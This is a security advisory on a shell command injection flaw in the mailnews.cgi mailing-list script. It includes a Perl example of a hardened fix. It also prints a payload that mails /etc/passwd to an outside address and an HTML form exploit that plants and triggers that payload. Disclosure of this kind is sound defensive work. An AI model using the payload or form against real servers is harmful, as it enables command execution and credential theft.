COMMAND

    mailnews.cgi

SYSTEMS AFFECTED

    mailnews.cgi 1.1, 1.3

PROBLEM

    Kanedaaa Bohater found the following.  The author doesn't filter
    some characters and uses a very stupid "password protection".  We
    can add or delete users from the mailing list without knowing the
    admin password.  But this is a small problem.  Let's see what more
    we can do.

        open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";

    where $mailprog is sendmail by default and $member is a user from
    the users file.  Now we can do something like this: add the user
    "; cat /etc/passwd | mail adam@malysz.pl" and use the subroutine
    to execute this code.
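
    The piped open above passes the whole string to the shell, so shell
    metacharacters in a stored address are interpreted.  A hardened form
    of that step, as an added example (not code from mailnews.cgi or its
    author): the sub names and the sendmail path are assumptions, and
    the sample entries are constructed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed path; the advisory only says $mailprog defaults to sendmail.
my $mailprog = '/usr/sbin/sendmail';

# Allow-list check for a subscriber address (hypothetical helper): no
# whitespace or shell metacharacters, and no leading '-' that sendmail
# would read as an option.
sub is_safe_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9_+][A-Za-z0-9._+-]*\@[A-Za-z0-9][A-Za-z0-9.-]*\z/
        ? 1 : 0;
}

# Replacement for:  open (MAIL, "|$mailprog $member")
# The list form of a pipe open execs $mailprog directly, so $member is
# passed as a single argument and never reaches /bin/sh.
sub send_to_member {
    my ($member, $message) = @_;
    die "refusing unsafe address\n" unless is_safe_address($member);
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't run $mailprog: $!\n";
    print {$mail} $message;
    close($mail) or warn "$mailprog exited with status $?\n";
    return 1;
}

# Constructed users-file entries; the second is the string from the advisory.
my @members = (
    'reader@example.org',
    '; cat /etc/passwd | mail adam@malysz.pl',
    '-t@example.org',
);

# Only the validation runs here; send_to_member() needs a local sendmail.
for my $m (@members) {
    printf "%-42s %s\n", $m, is_safe_address($m) ? 'accept' : 'reject';
}
```

    The same check belongs at subscribe time, before an address is
    written to the users file.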

    Simple exploit in HTML:

    <HTML>
    <BODY>
    <FORM
    ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
    <INPUT type=hidden NAME="action" value="subscribe">
    <BR>
    User to add with ;  [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
    without quotes, of course ]<INPUT NAME="address" TYPE="TEXT">
    <INPUT  TYPE="SUBMIT" VALUE="Submit">
    </FORM>
    <BR>
    <A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
    Execute command :] </A>
    <CENTER> Peace... </CENTER>
    </BODY>
    </HTML>

SOLUTION

    Nothing yet.